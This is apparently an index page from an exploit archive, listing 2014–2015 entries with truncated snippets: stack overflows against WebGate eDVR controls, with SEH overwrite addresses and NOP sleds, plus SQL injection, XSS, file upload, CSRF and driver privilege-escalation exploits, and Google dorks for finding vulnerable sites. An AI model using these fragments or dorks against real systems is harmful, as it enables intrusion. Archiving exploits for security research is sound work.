WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow

var arg1="PraveenD"; var arg2=1; var arg3= ""; var arg4="PraveenD"; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i1664; i++ arg3 += "B"; var nseh = "\xeb\x10PD"; //WESPSerialPort.dll0x100104e7 = pop pop ret var seh = "\xe7\x04\x01\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...

WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow

WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...

WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow

WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow var arg1 = ""; var arg2 = 1; var arg3 = 1; var nops = ""; var shellcode = ""; var buff2 = ""; for i=0; i128; i++ arg1 += "B"; var nseh = "\xeb\x10PD"; var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops += "\x90"; shellcode =...

WordPress DesignFolio+ Theme File Upload

Exploit Title: Wordpress Theme DesignFolio+ Arbitrary File Upload Vulnerability Google dork: inurl:wp-content/themes/DesignFolio-Plus Author: CrashBandicot Date: 04.03.2015 OSVDB-ID: 119623 Vendor HomePage: https://github.com/UpThemes/DesignFolio-Plus Software Link:...

Joomla Spider FAQ Component - SQL Injection Vulnerability

Exploit for php platform in category web applications Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability Author : Manish Kishan Tanwar AKA error1046 Vendor Link : http://demo.web-dorado.com/spider-faq.html Date : 21/03/2015 Discovered at : IndiShell Lab Love to : zero cool,Te...

WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow

WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow var buff1 = ""; var arg2=1; var arg3=1; var arg4=1; var nops = ""; var buff2 = ""; for i=0;i24; i++ buff1 += "B"; // jump over seh to shellcode nseh = "\xeb\x08PD"; // pop pop ret var seh = "\xa0\xf2\x07\x10"; for i=0;i80; i++ nops +=...

Joomla Random Article SQL Injection

Exploit Title : Joomla Random Article Component SQL Injection vulnerability Author : Jagriti Sahu AKA Incredible Vendor Link : http://demo.web-dorado.com Date : 23/03/2015 Discovered at : IndiShell Lab Love to : error1046 ^^ ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ^^...

Joomla Spider FAQ SQL Injection

Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability Author : Manish Kishan Tanwar AKA error1046 Vendor Link : http://demo.web-dorado.com/spider-faq.html Date : 21/03/2015 Discovered at : IndiShell Lab Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kisha...

724CMS 5.01 / 4.59 / 4.01 / 3.01 SQL Injection

724CMS 5.01 Multiple SQL Injection Security Vulnerabilities Exploit Title: 724CMS Multiple SQL Injection Security Vulnerabilities Vendor: 724CMS Product: 724CMS Vulnerable Versions: 3.01 4.01 4.59 5.01 Tested Version: 5.01 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015...

Innovative WebPAC Pro 2.0 Open Redirect

Innovative WebPAC Pro 2.0 Unvalidated Redirects and Forwards URL Redirection Security Vulnerabilities Exploit Title: Innovative WebPAC Pro 2.0 /showres url parameter URL Redirection Security Vulnerabilities Vendor: Innovative Interfaces Inc Product: WebPAC Pro Vulnerable Versions: 2.0 Tested...

WordPress Daily Edition Theme 1.6.2 Cross Site Scripting

WordPress Daily Edition Theme v1.6.2 XSS Cross-site Scripting Security Vulnerabilities Exploit Title: WordPress Daily Edition Theme /fiche-disque.php id Parameters XSS Security Vulnerabilities Product: WordPress Daily Edition Theme Vendor: WooThemes Vulnerable Versions: v1.6. v1.5. v1.4. v1.3...

MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)

!/usr/bin/env python Exploit Title: MooPlayer 1.3.0 'm3u' SEH Buffer Overflow POC Date Discovered: 09-02-2015 Exploit Author: Samandeep Singh SaMaN - @samanL33T Vulnerable Software: Moo player 1.3.0 Software Link: https://mooplayer.jaleco.com/ Vendor site: https://mooplayer.jaleco.com/ Version:...

K7 Computing 14.2.0.240 Privilege Escalation

/ Exploit Title - K7 Computing Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.k7computing.co.uk/ Tested Version - 14.2.0.240 Driver Version - 12.8.0.104 - K7Sentry.sys Tested on OS - 32bit Windo...

BullGuard Multiple Products Arbitrary Write Privilege Escalation Exploit

Exploit for windows platform in category local exploits / Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.bullguard.com/ Tested Version - 14.1.285.4 Driver Version -...

ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery

:8020/STATEID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST" input type="hidden"...

Sefrengo CMS 1.6.1 - Multiple SQL Injection Vulnerabilities

Sefrengo CMS version 1.6.1 suffers from multiple remote SQL injection vulnerabilities. Exploit Title: Sefrengo CMS v1.6.1 - Multiple SQL Injection Vulnerabilities Google Dork: N/A Date: 01/26/2015 Exploit Author: Nguyen Hung Tuan email protected & ITAS Team www.itas.vn Vendor Homepage:...

Trend Micro 8.0.1133 (Multiple Products) - Local Privilege Escalation

/ Exploit Title - Trend Micro Multiple Products Arbitrary Write Privilege Escalation Date - 31st January 2015 Discovered by - Parvez Anwar @parvezghh Vendor Homepage - http://www.trendmicro.co.uk/ Tested Version - 8.0.1133 Driver Version - 2.0.0.1009 - tmeext.sys Tested on OS - 32bit Windows XP...

Sites Powered By INVEM SQL Injection

+++++++++++++++++++++++++++++++++ + +Exploit Title : Invem CMS SQL INJECTION Vulnerability + +Exploit Author : Ashiyane Digital Security Team + +Vendor Homepage: http://www.invem.com/ + +Google Dork : intext:Powered by INVEM. + +Date : 20 / Jan / 2015 + +Tested On : windows se7en + linux Kali +...

Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting

Social Microblogging PRO 1.5 - Persistent Cross-Site Scripting Exploit Title: Social Microblogging PRO 1.5 Stored XSS Vulnerability Date: 29-12-2014 Exploit Author: Halil Dalabasmaz Version: v1.5 Vendor Homepage: http://codecanyon.net/item/social-microblogging-pro/9217005 Tested on: Chrome &...

jetAudio 8.1.3.2200 Crash Proof Of Concept

Exploit Title : jetAudio 8.1.3.2200 Basic m3u Crash POC Product : jetAudio Basic Date : 27.12.2014 Exploit Author : Hadji Samir [email protected] Software Link : http://www.jetaudio.com/download/ Vulnerable version : 8.1.3.2200 Basic Vendor Homepage : http://www.jetaudio.com/ Tested on : Windows 7...